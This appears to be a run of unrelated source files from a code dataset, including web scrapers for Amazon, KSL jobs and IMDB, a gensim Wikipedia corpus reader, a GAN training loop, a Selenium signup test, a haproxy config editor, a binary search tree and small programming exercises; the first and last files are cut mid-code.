title=re.compile('[1-5]\\.[0-5] out of 5 stars'))['title']\n review.rating = float(rating_text[:3])\n\n return review\n\ndef get_rank(html):\n \"\"\"\n Parses a profile object based on an html string\n :param html: A string containing the html of a profile page\n :return: A profile object\n \"\"\"\n dom = bs4.BeautifulSoup(html, 'html.parser')\n bio 
= _select(dom, '.bio-expander', important=False)\n if bio:\n return int(_find(bio, text=re.compile('#' + num_format))[1:].replace(',', ''))\n else:\n return None\n\n\ndef get_product(xml):\n \"\"\"\n Parses a product object based on an xml string\n :param xml: A string containing the xml of an amazon response for a product\n :return: A product object\n \"\"\"\n dom = bs4.BeautifulSoup(xml, 'html.parser')\n xml = _select(dom, 'itemlookupresponse > items > item')\n product = models.Product(id=_select(xml, 'asin').text)\n\n product.title = _select(xml, 'itemattributes > title').string\n product.product_url = _select(xml, 'detailpageurl').string\n product.reviews_url = _select(xml, 'customerreviews > iframeurl').string\n product.retrieval_date = datetime.datetime.today()\n product.category = _select(xml, 'itemattributes > productgroup').string\n\n # concatenate all description data\n features = _select_all(xml, 'itemattributes > feature')\n product.description = '. '.join([feature.string for feature in features]) + '. '\n for editorial_review in _select_all(xml, 'editorialreviews > editorialreview'):\n if editorial_review.source.string == 'Product Description':\n product.description += editorial_review.content.string\n\n return product\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"251937676","text":"'''\nRewriting of gensim.corpora.wikicorpus.py where Wikipedia\nis a json.gz file. Each line of the json file is a\nWikipedia page in the format:\n\n {\n 'wikiTitle': str\n 'wikiId': int\n 'sentences': [str]\n }\n\nFurthermore, tokenize and lemmatize and process_article functions are changed\nby removing some processing (our Wikipedia dump is already cleaned).\n'''\n\n# Copyright (C) 2010 Radim Rehurek \n# Copyright (C) 2012 Lars Buitinck \n# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html\n\nfrom gensim.corpora import wikicorpus\nfrom gensim import utils\n\nimport re\nimport gzip\nimport multiprocessing\nimport json\nimport logging\n\nfrom pattern.en import parse\n\nfrom latent_utils import extract_json_pages\nfrom latent_utils import LEMMING\n\n\nlogger = logging.getLogger('JsonWikiCorpus')\n\n\ndef tokenize(text, lowercase=False, deacc=False, errors=\"strict\", to_lower=False, lower=False):\n # In wikipedia-w2v-linkCorpus.json.gz text is already tokenized by spaces.\n\n # remove numbers and co.\n regexped = {match.group() for match in utils.PAT_ALPHABETIC.finditer(text)}\n\n # alwatys keep ent_wikiID tokens.\n return [word for word in text.split(' ')\n if word.startswith('ent_') or word in regexped]\n\n\ndef lemmatize(content, allowed_tags=re.compile('(NN|VB|JJ|RB)'), light=False,\n stopwords=frozenset(), min_length=2, max_length=15):\n '''\n Lemmatizes content where ent_wiki_ids are never removed. 
\n '''\n content = (' ').join(tokenize(content, lower=True, errors='ignore'))\n\n parsed = parse(content, lemmata=True, collapse=False)\n result = []\n for sentence in parsed:\n for token, tag, _, _, lemma in sentence:\n\n if lemma.startswith('ent_') and lemma not in stopwords:\n # Wikipedia entity\n result.append(lemma.encode('utf8'))\n continue\n\n if min_length <= len(lemma) <= max_length and not lemma.startswith('_') and lemma not in stopwords:\n if allowed_tags.match(tag):\n lemma += \"/\" + tag[:2]\n result.append(lemma.encode('utf8'))\n return result\n\n\ndef process_article(args):\n \"\"\"\n Parse a wikipedia article, returning its content as a list of tokens\n (utf8-encoded strings).\n\n @params args (text, to_lemmatize, title, pageid)\n \"\"\"\n text, to_lemmatize, title, pageid = args\n if to_lemmatize:\n result = lemmatize(text)\n else:\n result = tokenize(text)\n\n return result, title, pageid\n\n\nclass JsonWikiCorpus(wikicorpus.WikiCorpus):\n\n def __init__(self, fname, processes=None, to_lemmatize=LEMMING, dictionary=None, filter_namespaces=('0',)):\n self.to_lemmatize = to_lemmatize # avoid confusion between function and variable\n super(JsonWikiCorpus, self).__init__(fname, processes, to_lemmatize, dictionary, filter_namespaces)\n\n def get_texts(self, keep_wiki_ids=None):\n articles, articles_all = 0, 0\n positions, positions_all = 0, 0\n texts = ((text, self.to_lemmatize, title, pageid) for title, text, pageid in extract_json_pages(self.fname, self.filter_namespaces, keep_wiki_ids))\n pool = multiprocessing.Pool(self.processes)\n\n for group in utils.chunkize(texts, chunksize=10 * self.processes, maxsize=1):\n for tokens, title, pageid in pool.imap(process_article, group): # chunksize=10):\n articles_all += 1\n positions_all += len(tokens)\n # article redirects and short stubs are pruned here\n if keep_wiki_ids is None and len(tokens) < wikicorpus.ARTICLE_MIN_WORDS or any(title.startswith(ignore + ':') for ignore in wikicorpus.IGNORED_NAMESPACES):\n continue\n articles += 1\n positions += len(tokens)\n if self.metadata:\n yield (tokens, (pageid, title))\n else:\n yield tokens\n pool.terminate()\n\n logger.info(\n \"finished iterating over Wikipedia corpus of %i documents with %i positions\"\n \" (total %i articles, %i positions before pruning articles shorter than %i words)\",\n articles, positions, articles_all, positions_all, wikicorpus.ARTICLE_MIN_WORDS)\n self.length = articles # cache corpus length\n# endclass WikiCorpus\n","sub_path":"src/main/python/latent/json_wikicorpus.py","file_name":"json_wikicorpus.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"513449039","text":"import time\nimport json\nimport requests\nimport urllib3\nfrom random import randint\nfrom bs4 import BeautifulSoup\nfrom threading import Thread\n\nurllib3.disable_warnings()\nBASE_URL = \"https://jobs.ksl.com/search/posted/last-7-days\"\nHEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\"\n}\nJOBS = {}\n\n\ndef getJobDescriptions(url, headers):\n\n data = requests.get(url=url, headers=headers, verify=False, timeout=20)\n data.close()\n soup = BeautifulSoup(data.text, \"html.parser\")\n\n descriptionTag = soup.find_all(\n \"meta\", {\"property\": \"og:description\"}, \"html.parser\"\n )\n\n description = descriptionTag[0][\"content\"]\n JOBS[url][\"description\"] = description\n\n\ndef 
writeToFile():\n global JOBS\n with open(\"sample.json\", \"w\") as outfile:\n json.dump(JOBS, outfile)\n\n\ndef getJobListings(url, headers):\n dataX = requests.get(url=url, headers=headers, verify=False, timeout=20)\n soup = BeautifulSoup(dataX.text, \"html.parser\")\n dataX.close()\n\n script = soup.find_all('script', {'type': 'application/ld+json'})\n content = script[0].contents[0]\n\n jobsArray = json.loads(content)[\"itemListElement\"]\n threads = []\n for job in jobsArray:\n JOBS[job[\"url\"]] = {\n \"name\": job[\"title\"],\n \"employer\": job[\"hiringOrganization\"][\"name\"],\n \"url\": job[\"url\"],\n }\n t = Thread(target=getJobDescriptions, args=(job[\"url\"], headers))\n threads.append(t)\n\n for i in threads:\n i.start()\n\n # Making sure all the jobs description is fetched\n for i in threads:\n i.join()\n\n print(f\"Number of jobs Scraped {len(JOBS)}\")\n\n writeToFile()\n\n next_page = soup.find(\"a\", {\"class\": \"next link\"})\n\n if next_page is not None:\n getJobListings(next_page.get(\"href\"), HEADERS)\n\n\ngetJobListings(BASE_URL, HEADERS)\n","sub_path":"src/ksl.py","file_name":"ksl.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"68042899","text":"import numpy as np\nfrom scipy.misc import imsave\nimport matplotlib.pyplot as plt\n\nfrom batch_generators.batch_generators import TwoClassBatchGenerator\nfrom batch_generators.batch_gen_utils import get_two_classes_celeba, get_anime\nfrom neural_nets.identity_gan import IdentityGan\n\ncrop_size = 100\nlr = .0001\nbatch_size = 16\nwasserstein = False\ng_iters = 1\nd_iters = 1\n\n########################\n# Batch gen\n########################\n\nwomen, men = get_two_classes_celeba('sex')#get_women_UTKFACE()\n\nanime = get_anime()\n\nbatchgen = TwoClassBatchGenerator(file_list_a=women, file_list_b=anime, height=crop_size, width=crop_size)\n\nn, p = batchgen.generate_batch(12)\n\nn = np.concatenate([n[0:6]], axis=0)\nn = n.reshape([crop_size * 6, crop_size, 3])\np = np.concatenate([p[0:6]], axis=0)\np = p.reshape([crop_size * 6, crop_size, 3])\nt = np.concatenate([n, p], axis=1)\n\nplt.imshow(t)\n\n########################\n# Identity gan\n########################\n\ngan = IdentityGan(crop_size=crop_size,\n identity_weight=1,\n wasserstein=wasserstein)\n\ni = 0\nwhile True:\n\n for _ in range(g_iters):\n\n neg_batch, pos_batch = batchgen.generate_batch(batch_size)\n neg_batch, pos_batch = (neg_batch * 2) - 1, (pos_batch * 2) - 1\n\n # train G\n _ = gan.sess.run([gan.g_train_op], feed_dict={gan.input_face: neg_batch})\n\n for _ in range(d_iters):\n\n neg_batch, pos_batch = batchgen.generate_batch(batch_size)\n neg_batch, pos_batch = (neg_batch * 2) - 1, (pos_batch * 2) - 1\n\n # train D\n _ = gan.sess.run([gan.d_train_op], feed_dict={gan.input_face: neg_batch, gan.real: pos_batch})\n\n # if wasserstein:\n # gan.sess.run(gan.clipping_op)\n\n # save sample\n if i % 100 == 0:\n output = gan.sess.run([gan.generator_output],\n feed_dict={gan.input_face: neg_batch[0:1]})\n sample = np.concatenate([neg_batch[0], output[0][0]], axis=0)\n\n sample = sample.reshape(crop_size * 2, crop_size, 3)\n save_path = 'samples/identity_gan_sample_{}.jpg'.format(i)\n imsave(save_path, sample)\n print('Sample saved to {}.'.format(save_path))\n\n # save model\n if i % 10000 == 0:\n save_path = gan.saver.save(gan.sess, 'models/identity_gan_{}.ckpt'.format(i))\n print('Model saved to {}.'.format(save_path))\n\n i += 
1\n","sub_path":"train_identity_gan.py","file_name":"train_identity_gan.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433659725","text":"from time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import Select\nimport sys\n################################################################\n#(number of users)\nN = 2\n#(number of feed per scope) * (number of scope)\nF = 1*3\n#(number of reply per feed)\nR = 2\n#(number of chat)\nC = 1\n################################################################\ndrivers = []\nscopes = ['Public', 'Friend Only', 'Private']\nlikes = ['like', 'dislike']\n################################################################\ndef end_test(message, e):\n print(message)\n print('Exception Message: ', e)\n sys.exit(1)\n\ndef find_by_id(driver, name):\n try:\n ret = driver.find_element_by_id(name)\n except NoSuchElementException as e:\n end_test('find_by_id: Cannot find %s' % name, e)\n sys.exit(1)\n return ret\n\ndef find_or_error(driver, name):\n try:\n driver.find_element_by_id(name)\n except NoSuchElementException:\n return False\n return True\n\ndef send_keys(_element, _key):\n try:\n _element.send_keys(_key + Keys.RETURN)\n except Exception as e:\n end_test('Cannot send %s' % _key ,e)\n sleep(0.5)\n\ndef send(driver, name, _key):\n try:\n _element = find_by_id(driver, name)\n _element.send_keys(_key + Keys.RETURN)\n except Exception as e:\n end_test('Cannot send {0} to {1}'.format(_key, name), e)\n\ndef click(driver, name):\n try:\n _element = find_by_id(driver, name)\n _element.click()\n except Exception as e:\n end_test('Cannot click %s' % name, e)\n sleep(0.5)\n\ndef signup_test(driver, uname, upwd, duplication):\n try:\n click(driver, 'SignUp')\n send(driver, 'input-username', uname)\n send(driver, 'input-password', upwd)\n send(driver, 'input-retypepassword', upwd)\n click(driver, 'SignUp')\n if duplication==True:\n exist = find_or_error(driver, 'login-error-box') and \\\n find_or_error(driver, 'login-error-msg') and \\\n find_or_error(driver, 'login-error-confirm')\n if(not exist):\n print('Duplicated SignUp('+uname+') test failed')\n sys.exit(1)\n click(driver, 'login-error-confirm')\n print('Duplicated SignUp('+uname+') test success')\n else:\n exist = find_or_error(driver, 'login-error-box') or \\\n find_or_error(driver, 'login-error-msg') or \\\n find_or_error(driver, 'login-error-confirm')\n if exist:\n print('SignUp(' + uname + ') test failed')\n sys.exit(1)\n print(uname + ' SignUp success')\n except Exception as e:\n end_test('\\nSignUp test failed', e)\n\n################################################################\nfor i in range(0, 1):\n print('drivers[{0}] open'.format(i))\n drivers.append(webdriver.Chrome('/usr/local/bin/chromedriver'))\n #drivers[i].get('http://localhost:3000')\n drivers[i].get('http://13.124.80.116:3000')\n print('drivers[{0}] open successful'.format(i))\n\n\n################################################################\nprint('\\nSignUp test:')\n\nfor i in range(0, N):\n uname = 'user{0}'.format(i)\n upwd = 'user{0}'.format(i)\n signup_test(drivers[0], uname, upwd, 
False)\n\ndrivers[0].quit()","sub_path":"progress/usercreate_front.py","file_name":"usercreate_front.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628252379","text":"\"\"\"Path Finder #2: shortest path\n\nYou are at position [0, 0] in maze NxN and you can only move in\none of the four cardinal directions (i.e. North, East, South, West). \nReturn the minimal number of steps to exit position [N-1, N-1] \nif it is possible to reach the exit from the starting position. \nOtherwise, return false in JavaScript/Python.\n\nEmpty positions are marked .. \nWalls are marked W. \nStart and exit positions are guaranteed to be empty in all test cases.\n\"\"\"\n\n\n# Tell variables and constants by the cases they're written.\n# D and WALL will never change: they're constants.\nD = [(0, 1), (0, -1), (1, 0), (-1, 0)]\nWALL = 'W'\n\n# Very simple BFS problem\ndef path_finder(maze):\n maze = maze.split()\n N = len(maze)\n DEST = (N-1, N-1) # Dest won't change in this problem\n distances = [[-1] * N for _ in range(N)]\n distances[0][0] = 0\n queue = [(0, 0)]\n \n while queue:\n r, c = queue.pop(0)\n for dr, dc in D:\n new_r, new_c = r + dr, c + dc\n if 0 <= new_r < N and 0 <= new_c < N \\\n and distances[new_r][new_c] == -1 \\\n and maze[new_r][new_c] != WALL:\n distances[new_r][new_c] = distances[r][c] + 1\n # If we have reached DEST, just return it. No need to move on.\n if (new_r, new_c) == DEST:\n return distances[new_r][new_c]\n queue.append((new_r, new_c))\n \n # If we couldn't reach DEST, return False\n return False\n\n'''\ndef path_finder(s):\n maze = [[1 if p == \".\" else 0 for p in line] for line in s.split(\"\\n\")]\n N = len(maze)\n adj = [[] for _ in range(N*N)]\n for i in range(N):\n for j in range(N):\n if maze[i][j]:\n target = adj[i+j+(N-1)*i]\n if i > 0 and maze[i-1][j] == 1:\n target.append(i-1+j+(N-1)*(i-1))\n if j > 0 and maze[i][j-1] == 1:\n target.append(i+j-1+(N-1)*i)\n if i < N-1 and maze[i+1][j] == 1:\n target.append(i+1+j+(N-1)*(i+1))\n if j < N-1 and maze[i][j+1] == 1:\n target.append(i+j+1+(N-1)*i)\n\n def bfs(adj, start, end):\n N = len(adj)\n distance = [-1] * N\n parent = [-1] * N\n queue = []\n distance[start] = 0\n parent[start] = start\n queue.append(start)\n while queue:\n here = queue.pop(0)\n for i in range(len(adj[here])):\n there = adj[here][i]\n if distance[there] == -1:\n queue.append(there)\n distance[there] = distance[here] + 1\n parent[there] = here\n path = [end]\n while parent[end] != end:\n end = parent[end]\n if end >= 0:\n path.append(end)\n path.reverse()\n return path\n \n path = bfs(adj, 0, len(adj)-1)\n return len(path)-1 if len(path) > 1 else False\n''' \n \n\n\na = \"\\n\".join([\n \".W.\",\n \".W.\",\n \"...\"\n])\n\nb = \"\\n\".join([\n \".W.\",\n \".W.\",\n \"W..\"\n])\n\nc = \"\\n\".join([\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \"......\"\n])\n\nd = \"\\n\".join([\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \".....W\",\n \"....W.\"\n])\n\ndef assert_equals(f, ret):\n if f == ret:\n print(True)\n else:\n print(False)\n\nassert_equals(path_finder(a), 4)\nassert_equals(path_finder(b), False)\nassert_equals(path_finder(c), 10)\nassert_equals(path_finder(d), False)\n","sub_path":"python/codewars/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"242793561","text":"msg, shift = input().split()\nshift = int(shift)\nif shift < 1 or shift > 26:\n print(\"Error\")\nelse:\n encode = ''\n for char in msg:\n x = ord(char.lower()) - shift\n if x < 97:\n x += 26\n encode += chr(x).upper()\n print(encode)\n","sub_path":"Jeewa/chapter 6/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"265115708","text":"from requests import get\nfrom bs4 import BeautifulSoup\nimport jsonlines\n\ngenres = [\"action\", \"adventure\", \"animation\", \"biography\", \"comedy\", \"crime\", \"documentary\", \"drama\", \"family\",\n \"fantasy\", \"film_noir\", \"game_show\", \"history\", \"horror\", \"music\", \"musical\", \"mystery\", \"news\",\n \"reality_tv\", \"romance\", \"scifi\", \"sport\", \"talk_show\", \"thriller\", \"war\", \"western\"]\n\nmovies_list = list()\n\nmovie_counter = 0\n\n\ndef start_crawling():\n loop_through_genres()\n\n\ndef loop_through_genres():\n for genre in genres:\n print(\"Exportando arquivo do gênero: \" + genre.upper() + \" no formado JSONL \")\n print(\"------------------------------------------------------\")\n\n loop_through_pages(genre)\n\n\ndef loop_through_pages(genre):\n for page in range(0, 10):\n print(\"Lendo a página: \" + str(page + 1) + \" da seleção de: \" + genre)\n\n imdb_url = \"https://www.imdb.com/search/title?release_date=1500-01-01,2018-12-31&user_rating=1.0,10.0&genres=\"\\\n + str(genre) + \"&sort=user_rating,desc&start=\" + str(movie_counter)\n\n response = get(imdb_url)\n\n next_page()\n\n loop_through_movies(genre, response)\n clear_list_of_movies()\n\n\ndef loop_through_movies(genre, response):\n movies = BeautifulSoup(response.text, 'html.parser')\n for movie in movies.findAll(\"div\", {\"class\": \"lister-item mode-advanced\"}):\n title = movie.a.img[\"alt\"]\n rating = movie.find(\"div\", {\"class\": \"inline-block ratings-imdb-rating\"})\n rating = rating.strong.text\n\n write_jsonl(movies_list, genre, rating, title, genre)\n\n\ndef next_page():\n global movie_counter\n movie_counter += 50\n reset_movie_counter_after_read_all()\n\n\ndef reset_movie_counter_after_read_all():\n global movie_counter\n if movie_counter == 500:\n print(\"------------------------------------------------------\")\n print(\"Total de \" + str(movie_counter) + \" filmes exportados\")\n print(\"------------------------------------------------------\")\n movie_counter = 0\n\n\ndef clear_list_of_movies():\n if movie_counter == 0:\n movies_list.clear()\n\n\ndef write_jsonl(movie_list, genre, rating, title, json_name):\n dict_movies = {'title': title, 'genre': genre, 'rating': rating}\n movie_list.append(dict_movies)\n with jsonlines.open(json_name + '.jsonl', mode='w') as writer:\n writer.write(movie_list)\n\n\nstart_crawling()\n","sub_path":"webcrawling/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"594184542","text":"dogs = [\n {\n \"name\" : \"Melba\",\n \"handle\" : \"melba\",\n \"bio\" : \"Hi, I'm Melba! I'm a mini-goldendoodle and I love to play.\",\n \"age\" : 3\n },\n {\n \"name\" : \"Charlie\",\n \"handle\" : \"chucky\",\n \"bio\" : \"Hi I'm Charlie! I'm a big white standard poodle.\",\n \"age\" : 7\n },\n {\n \"name\" : \"Rosie\",\n \"handle\" : \"rose\",\n \"bio\" : \"Hi I'm Rosie! 
I'm from the hard streets of LA, don't mess with me.\",\n \"age\" : 9\n }\n]\n\n# def get_dog_by_handle(handle):\n# for dog in dogs:\n# if dog['handle'] == handle:\n# return dog\n# return None\n\n# posts = [\n# {\n# \"text\" : \"I'm so excited to move to California!\",\n# \"handle\" : \"melba\",\n# \"likes\" : [\"rose\", \"chucky\"],\n# \"id\" : \"1\"\n# },\n# {\n# \"text\" : \"Hung out with @melba!\",\n# \"handle\" : \"rose\",\n# \"likes\" : [\"melba\",\"chucky\"],\n# \"id\" : \"6\"\n# },\n# {\n# \"text\" : \"Great game of fetch today with my Dad, Paul\",\n# \"handle\" : \"melba\",\n# \"likes\" : [\"rose\"],\n# \"id\" : \"2\"\n# },\n \n# {\n# \"text\" : \"Took a great 8 hour nap today, then guarded the household\",\n# \"handle\" : \"chucky\",\n# \"likes\" : [\"rose\"],\n# \"id\" : \"3\"\n# },\n# {\n# \"text\" : \"Peanut butter is my favorite snack!\",\n# \"handle\" : \"melba\",\n# \"likes\" : [\"chucky\"],\n# \"id\" : \"4\"\n# },\n# {\n# \"text\" : \"Today I stole food from a blind dog.\",\n# \"handle\" : \"rose\",\n# \"likes\" : [\"melba\",\"chucky\"],\n# \"id\" : \"5\"\n# }\n \n# ]\n\ndef add_post_url():\n results = []\n for post in posts:\n for dog in dogs:\n sub = \"@\" + dog['Handle']\n print(sub)\n if sub in post['Text']:\n link = '' + sub + ''\n post['Text'] = post['Text'].replace(sub, link) \n results.append(post)\n return results\n\n# def get_posts_by_handle(handle):\n# results = []\n# url_posts = add_post_url()\n# for post in url_posts:\n# if post['handle'] == handle:\n# results.append(post)\n# return results\n\ndef get_post_by_id(id):\n for post in posts:\n if post['id'] == id:\n return post\n return None","sub_path":"fake_data.py","file_name":"fake_data.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"86787613","text":"from colorpicker_test_ui import Ui_Dialog\nfrom colorpicker import ColorpickerDialog\nfrom PyQt5 import QtWidgets, QtCore, QtGui\n\n\nclass ColorpickerTestWindow(Ui_Dialog):\n def __init__(self, dialog):\n super().__init__()\n self.setupUi(dialog)\n\n self.pushButton.clicked.connect(self.pushButton_callback)\n\n def pushButton_callback(self):\n dialog = QtWidgets.QDialog()\n colorpicker = ColorpickerDialog(dialog)\n dialog.exec_()\n print (colorpicker.result_clrstr)","sub_path":"src/colorpicker/colorpicker_test.py","file_name":"colorpicker_test.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"3157627","text":"\"\"\"Created by Connor Murray (connormurray7@gmail.com)\non 08/30/2016.\n\nA simple binary search tree with NO self-balancing.\n\"\"\"\nfrom collections import deque\n\n\nclass BinarySearchTree(object):\n \"\"\"A simple binary search tree with no self-balancing.\"\"\"\n\n class Node(object):\n \"\"\"Node as internal data structure\"\"\"\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.left = None\n self.right = None\n\n def __init__(self):\n self.head = None\n\n def __getitem__(self, key):\n \"\"\"Operator [] overloaded, O(log n) to get\"\"\"\n return self.get(key)\n\n def __setitem__(self, key, val):\n \"\"\"Operator [] overloaded, O(log n) to set\"\"\"\n self.put(key, val)\n\n def get(self, key):\n \"\"\"Returns the value for the key given O(log n)\"\"\"\n if self.head is None:\n return None\n if self.head.key == key:\n return self.head.val\n cur = self.head\n while cur and cur.key != key:\n if key < cur.key:\n cur = cur.left\n 
else:\n cur = cur.right\n return None if cur is None else cur.val\n\n def put(self, key, val):\n \"\"\"Constructs a node and places it in the tree O(log n)\"\"\"\n if self.head is None:\n self.head = self.Node(key, val)\n return\n cur = self.head\n while cur:\n last = cur\n if key < cur.key:\n cur = cur.left\n else:\n cur = cur.right\n if key < last.key:\n last.left = self.Node(key, val)\n else:\n last.right = self.Node(key, val)\n\n def __str__(self):\n d = deque()\n d.append(self.head)\n vals = []\n while len(d) > 0:\n cur = d.popleft()\n if cur is not None:\n vals.append(str(cur.val))\n d.append(cur.left)\n d.append(cur.right)\n out_str = ' '.join([val for val in vals])\n return \"BST [\" + out_str + \"]\"\n","sub_path":"python/data_structures/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"90122961","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# by cuiyaunrong\n\nimport os\n\nhaproxy_conf_file = \"haproxy.conf\"\nnew_haproxy_conf_file = \"new.conf\"\n\ndef bakfile():\n if os.path.exists(haproxy_conf_file):\n os.system(\"cp haproxy.conf bak/haproxy.conf.`date +'%Y%m%d%H%M%S'`\")\n else:\n print(\"配置文件不存在!!!!\")\n\ndef reset():\n if os.path.exists(haproxy_conf_file):\n os.system(\"cp -a new.conf haproxy.conf\")\n else:\n print(\"配置文件不存在!!!!\")\n\ndef fetch_record(backend):\n result = []\n with open('haproxy.conf', 'r') as f:\n flag = False\n for line in f:\n if line.strip().startswith('backend') and line.strip() == \"backend \" + backend:\n flag = True\n continue\n if flag and line.strip().startswith('backend'):\n break\n if flag and line.strip():\n result.append(line.strip())\n\n return result\n\ndef fetch_backend(backend):\n result = []\n with open('haproxy.conf', 'r') as f:\n flag = False\n for line in f:\n if line.strip().startswith('backend') and line.strip() == \"backend \" + backend:\n flag = True\n result.append(line.strip().split()[1])\n continue\n if flag and line.strip().startswith('backend'):\n break\n if flag and line.strip():\n break\n return result\n\ndef add_record(backend,record):\n result = fetch_record(backend)\n if result not in result:\n result.append(record)\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n continue_flag = False\n for line in old:\n line_str = line.strip()\n if line_str.startswith('backend') and line_str.endswith(backend):\n continue_flag = True\n new.write(line)\n for temp in result:\n new.write(\" \" * 8 + temp + \"\\n\")\n continue\n\n if continue_flag and line_str.startswith('backend'):\n continue_flag = False\n\n if continue_flag:\n pass\n else:\n new.write(line)\n\ndef delete_record(backend,record):\n result = fetch_record(backend)\n if record in result:\n result.remove(record)\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n continue_flag = False\n for line in old:\n line_str = line.strip()\n if line_str.startswith('backend') and line_str.endswith(backend):\n continue_flag = True\n new.write(line)\n for temp in result:\n new.write(\" \" * 8 + temp + \"\\n\")\n continue\n\n if continue_flag and line_str.startswith('backend'):\n continue_flag = False\n\n if continue_flag:\n pass\n else:\n new.write(line)\n\ndef update_record(backend,old_record,new_record):\n result = fetch_record(backend)\n if old_record in result:\n result.remove(old_record)\n result.append(new_record)\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') 
as new:\n continue_flag = False\n for line in old:\n line_str = line.strip()\n if line_str.startswith('backend') and line_str.endswith(backend):\n continue_flag = True\n new.write(line)\n for temp in result:\n new.write(\" \" * 8 + temp + \"\\n\")\n continue\n\n if continue_flag and line_str.startswith('backend'):\n continue_flag = False\n\n if continue_flag:\n pass\n else:\n new.write(line)\n\ndef add_backend(backend):\n result = fetch_backend(backend)\n if backend not in result:\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n for line in old:\n new.write(line)\n new.write(\"\\nbackend \" + backend)\n\ndef delete_backend(backend):\n result = fetch_backend(backend)\n if backend in result:\n with open('haproxy.conf', 'r') as old, open('new.conf', 'w') as new:\n continue_flag = False\n for line in old:\n line_str = line.strip()\n if line_str.startswith('backend') and line_str.endswith(backend):\n continue_flag = True\n continue\n\n if continue_flag and line_str.startswith('backend'):\n continue_flag = False\n\n if continue_flag:\n pass\n else:\n new.write(line)\n\n\n# ret = fetch_record('www.oldboy.org')\n# print(ret)\n# add_record('www.xiaocui.org','aaaaaaaaaaaaaa')\n# delete_record('www.oldboy.org','server 100.1.7.9 weight 20 maxconn 3000')\n# update_record('www.oldboy.org','server 100.1.7.9 weight 20 maxconn 3000','server 100.1.7.9 weight 20 maxconn 1000')\n# ret = fetch_backend('www.oldboy.org')\n# print(ret)\n# add_backend('www.doumi.com')\n# delete_backend('www.xiaocui.org')\n\ndef main():\n while True:\n print(\"=\" * 50)\n wel = \"\"\"\n 欢迎使用haproxy配置文件编辑工具。\n 1、查询backend\n 2、添加backend\n 3、删除backend\n 4、查询backend记录\n 5、添加backend记录\n 6、删除backend记录\n 7、更新backend记录\n 8、退出\n \"\"\"\n print(wel)\n print(\"=\" * 50)\n input_str = input(\"请输入上面操作对应的数字: \")\n\n if input_str == '1':\n backend = input(\"请输入backend名称:\")\n ret = fetch_backend(backend)\n print(ret)\n elif input_str == '2':\n bakfile()\n backend = input(\"请输入backend名称:\")\n add_backend(backend)\n reset()\n elif input_str == '3':\n bakfile()\n backend = input(\"请输入backend名称:\")\n delete_backend(backend)\n reset()\n elif input_str == '4':\n backend = input(\"请输入backend名称:\")\n ret = fetch_record(backend)\n print(ret)\n elif input_str == '5':\n bakfile()\n backend = input(\"请输入backend名称:\")\n record = input(\"请输入记录:\")\n add_record(backend, record)\n reset()\n elif input_str == '6':\n bakfile()\n backend = input(\"请输入backend名称:\")\n record = input(\"请输入记录:\")\n delete_record(backend,record)\n reset()\n elif input_str == '7':\n bakfile()\n backend = input(\"请输入backend名称:\")\n old_record = input(\"请输入老记录:\")\n new_record = input(\"请输入新纪录:\")\n update_record(backend, old_record, new_record)\n reset()\n elif input_str == '8':\n exit()\n else:\n print(\"输入错误,请重新输入。\")\n\nmain()","sub_path":"week03/Modify_haproxy_conf.py","file_name":"Modify_haproxy_conf.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"581235363","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport sorl.thumbnail.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Card',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('state', models.IntegerField(default=False, choices=[(0, b'For Sale'), (1, 
